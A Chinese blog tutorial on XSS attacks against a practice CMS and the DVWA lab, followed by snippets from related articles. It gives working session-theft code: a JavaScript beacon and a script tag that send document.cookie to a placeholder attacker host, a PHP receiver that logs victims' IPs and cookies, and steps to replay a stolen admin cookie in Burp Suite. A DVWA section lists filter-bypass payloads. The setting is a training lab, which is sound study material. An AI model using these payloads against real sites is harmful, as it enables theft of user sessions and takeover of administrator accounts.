XSS攻击【CMS,DVWA】通关技巧

已于 2024-07-02 08:52:17 修改
阅读量386 收藏 4
点赞数 3
文章标签: xss javascript 后端 前端 php
于 2024-07-01 17:25:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62199249/article/details/140104982
版权

CMS

搜索框弹窗:

<script>alert(1)</script>

获取管理员Cookie:

1.寻找目标网站的 xss 攻击点:留言板

2.制作并搭建接收远程Cookie的服务器(kali

开启kali的apache2服务:

service apache2 start
进入到/var/www/html目录下

制作一个 Js 文件:

var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src ='http://攻击服务器IP/xss.php?c='+ document.cookie;

制作一个 PHP 文件:

<?php
$ip=$_SERVER["REMOTE_ADDR"];

$cookie =$_GET["c"];

$fp ="/var/www/html/xss.txt";
$file = fopen($fp,"a+");
fwrite($file, $ip."\n");
fwrite($file, $cookie."\n");
fclose($file);
?>

3.提交盗取管理员 Cookie 的攻击代码

在输入框提交攻击代码,尽量将信息伪装的比较正常然后提交

<script language=javascript src=http://攻击服务器IP/xss.js></script>

4.等待管理员登录并查看留言

管理员登录管理后台查看留言板:

5.查看kali中是否生成了xss.txt文件

查看文件内容,复制Cookie

username=admin; userid=1; PHPSESSID=8n78cfmj1pd40n9nm0rgf7g5c0

6.使用接收到的管理员 Cookie 通过BP绕过身份验证直接登录网站后台

注意*:为了防止登录验证,应该直接在首页处开启抓包后点击后台管理

开启BP

点击后台管理

抓到相应的数据包,替换Cookie

可设置自动替换

打开BP->Proxy->Proxy settings->Tools->Proxy->Match and replace rules->add

match:^Cookie.*$
Cookie: 值
勾选上Regex match

此时发现Cookie已经替换,将数据包全部放行

成功进入后台

DVWA

XSS(Reflected)

Low:
<script>alert(document.cookie)</script>

Medium:

安全配置对<script>做了过滤

大写绕过
<SCRIPT>alert(document.cookie)</script>
双写绕过
<sc<script>ript>alert(document.cookie)<script>

Heigh:

安全配置对<script>做了逐字检查,并且不区分大小写

通过img标签报错和后执行onerror来弹窗
<img src=l onerror=alert(document.cookie)>

XSS(Stored)

Low:
<script>alert(document.cookie)</script>
如上述CMS留言板获取Cookie一样,将Cookie返回到攻击服务器上,此处XSS(Stored)只演示如何绕过防护配置
<script>document.location="http://攻击服务器IP/xss.php?cookie="+document.cookie</script>

Medium:

安全配置使用了htmlspecialchars()实体编码,难以绕过,但 name 框只做了简单限制

在 name 框输入
也可以使用 burpsuite 更改
大写绕过
<SCRIPT>alert(document.cookie)</script>
双写绕过
<sc<script>ript>alert(document.cookie)</script>

发现name框限制输入字符长度为10,F12修改其限制值

在name框内输入

Heigh:

安全配置使用了htmlspecialchars()实体编码,难以绕过,但 name 框只做了简单限制

在 name 框输入
也可以使用 burpsuite 更改
<img src=1 onerror=alert(document.cookie)>

XSS(DOM)

DOM特点:

过 document 把用户输入的值带入 value,最后显示给用户

Low:
<script>alert(document.cookie)</script>

在URL后输入

Medium:

安全配置对提交的值做检查,如果有<script 就跳转到 English

要逃逸option和select标签来运行img标签的内容
></option></select><img src=1 onerror=alert(document.cookie)>

如何查看闭合?

在选项栏处右键选择检查

在URL上输入

Heigh:

安全配置是以白名单的形式对用户输入做过滤,若不为选项中的值便跳到Englisgh

通过后端注释符来绕过,因为后端为PHP,#会注释掉后面内容,然后返还给前端,而前端为JS,#并不做注释,所以被带到前端执行
#<script>alert(document.cookie)</script>
URL编码绕过
#%3Cscript%3Ealert(document.cookie)%3c/script%3E

叶旭ベ
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BLUDIT CMS xss
F_carry的博客
08-09 4053
Visit the CMS home page and find that the JS code for the article content section is Log on in the background, there is an article release module You can see the successful pop-up window, execut...
存储型XSS CMS实战
她叫常玉莹
08-10 1382
Dedecms存储型xss 影响版本 DedeCMS-V5.7-UTF8-SP2,网站需要开启商城功能。 漏洞分析 address、des、email、postname参数过滤不严导致xss漏洞。postname只对长度做了限制。跟踪cn_substrR函数,跳转到string.helper.php文件中。 只使用stripslashes、addslashes函数进行了过滤,导致xss触发 漏洞修复 使用htmlspecialchars将html标签进行实体转义 修复结果 phpmywind_5.3
【漏洞学习——XSS】bagecms存储型xss可叉后台
Fly_鹏程万里
02-22 1272
漏洞细节 0x0A 前面发现留言板的过滤已经做的很好了,现在来说一个可以直接拿到管理员并且在后台修改php模板 getshell 的方法0x0B 首先我们来到了他的后台 0x0C 输入一串神奇的 xss  0x0D 登陆后台可以查看到,整个已经变形了,也就是说 logger 没有对 log 进行过滤记录,导致了存储型 XSS 。 0x0E 我们来看看这一项的代码 修复方案...
蝉知CMS 7.X XSS漏洞复现
qq_35664104的博客
09-27 1401
个人博客地址:xzajyjs.cn 作为一个开源的企业门户系统(EPS), 企业可以非常方便地搭建一个专业的企业营销网站,进行宣传,开展业务,服务客户。蝉知系统内置了文章、产品、论坛、评论、会员、博客、帮助等功能,同时还可以和微信进行集成绑定。功能丰富实用,后台操作简洁方便。蝉知系统还内置了搜索引擎优化必备的功能,比如关键词,摘要,站点地图,友好路径等,使用蝉知系统可以非常方便的搭建对搜索引擎友好的网站。 今天就对他的早期版本7.x的xss漏洞进行复现。 进到他的主页,先观察到有留言板,可以考虑是否存在
xss跳转代码_从某cmsxss漏洞来学习代码审计
weixin_39636696的博客
11-20 84
原创: xiaoyuer 合天智汇 各位大佬好,小弟的文章主要是通过针对具体的cms(内容管理系统)对一些基本的web漏洞进行挖掘和代码审计,这样学习起来能够理解的更加深刻。如有写的不对的地方请轻拍。cms选择了efucms:https://github.com/phplaber/efucms按照readme中给出的安装方式进行安装;安装完成后的界面如图所示:随...
谜团靶机writeup - DVWA-高等级靶场通关指南
小龙人
01-10 1112
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 谜团靶机平台地址:https://mituan.zone/ 选择靶机 初始化靶场,此次选择DVWA高等级靶场。 Brute Force 抓包后,注意修改token,初始token为Extract请求数据包中的token,线程为1。 Command Inje.
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-05 1668
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
2023年Ms08067安全实验室公众号年度盘点
m0_74360619的博客
01-31 1062
转眼之间,MS08067安全实验室已经陪伴大家第六个年头了,我们希望可以提供更多更好的安全技术给大家,能带给大家学习的便利。也希望作为安全人的你,在这条路上不孤单,我们一起进步,一起成长。
【漏洞学习——XSS】fineCMS免费版xss+getshell
Fly_鹏程万里
02-22 1797
漏洞细节 注册一个用户,在发表文章的地方发表文章 在编辑器里加入一张图片 用firebug修改图片地址 加入onerror属性 onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js' 因为发表的文章需要后台管理员审核的,当管理员审核的时候触发漏洞 然后是getsh...
熊海CMS漏洞练习平台的一次xss、sql注入、越权黑盒思路分析
xt350488的博客
07-14 913
建议自定义错误页面,以避免编程语言特性导致的网站根目录泄露问题,从而减少不必要的安全风险。原文:https://mp.weixin.qq.com/s/NkyXg3Dm5ZzFUGpqn0uzBQ。
DOM型XSS(跨站脚本攻击)的自动化测试和人工测试方法
m0_52484587的博客
07-16 231
它包含预定义的XSS payload集合,并采用多线程处理以提高效率,能够检测反射型、存储型以及DOM型XSS漏洞,并生成详细的报告。:使用如腾讯安全平台部提出的门神DOM-XSS防御JS等方案,通过JavaScript代码实现客户端防护,提高常见DOM XSS攻击的门槛。:通过浏览器的开发者工具,如F12,检查页面的DOM结构,尝试修改DOM元素的属性或内容,观察是否触发XSS。:分析Web页面的JavaScript代码,特别是那些动态生成HTML的部分,以查找可能的XSS漏洞。
xss复习总结及ctfshow做题总结xss
m0_74402888的博客
07-15 664
客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。存储型XSS:<持久化> 代码是存储在服务器数据库中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie(虽然还有种DOM型XSS,但是也还是包括在存储型XSS内)。
Sortable.js板块拖拽示例
w11111xxxl的博客
07-14 773
ghostClass: 'blue-background-class' // 拖动时元素的样式类。group: 'shared', // 允许与其它具有相同组名的元素交互。-- 引入 Sortable.js 的 CSS 和 JS 文件 -->width: 150px;/* 减少宽度 */height: 70px;/* 设置高度 */-- 引入 Sortable.js 的 JS 文件 -->animation: 150, // 动画速度。// 初始化 Sortable。
ReactRouter v6升级的步骤
feixin369的博客
07-14 419
React Router v6 引入了一个 Routes组件,它有点像Switch,但功能要强大得多。与Switch相比,RoutesReact.lazy。
vue搜索框过滤--- computed、watch区别
学习笔记分享给大家
07-16 333
计算属性computed适用于需要基于其他数据动态变化,并且需要缓存的场景。侦听器watch适用于需要响应数据变化,执行异步或开销较大操作的场景。方法methods适用于定义组件的具体行为,包括事件处理和业务逻辑等。
react 快速入门思维导图
最新发布
weixin_44565776的博客
07-18 114
只要掌握了这些react技能,基本就可以熟练使用react了
自定义 Hooks 在 Vue3 中的应用和重要性
CodeQi技术小栈的博客
07-16 972
自定义Hooks是Vue3提供的一种将可复用逻辑提取到独立函数中的方式。这不仅可以减少代码的重复,还能让你的代码更加清晰易读,维护起来也更加方便。在这篇文章中,我将通过详细的步骤和实例,带你深入了解如何在Vue3中使用自定义Hooks,以及它们在实际项目中的应用和重要性。首先,我们来看一下如何创建一个简单的自定义Hook。在Vue3中,自定义Hook本质上就是一个返回特定功能的函数。让我们从一个简单的计数器例子开始。
ios CCUIAlertActivityView.m
编程语言技巧经验分享
07-17 486
// // CCUIAlertActivityView.m // CCFC // // #import "CCUIAlertActivityView.h" #import "CCNSNumber.h" #import "CCU
DVWA靶场中的XSS攻击详解与防范
DVWA靶场中,可以模拟各种XSS攻击场景,通过工具如Burp Suite进行流量捕获和篡改,以了解攻击流程和防御策略。Burp Suite可以帮助识别潜在的XSS漏洞,并提供对请求和响应的深度分析。 理解XSS攻击的原理和类型,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值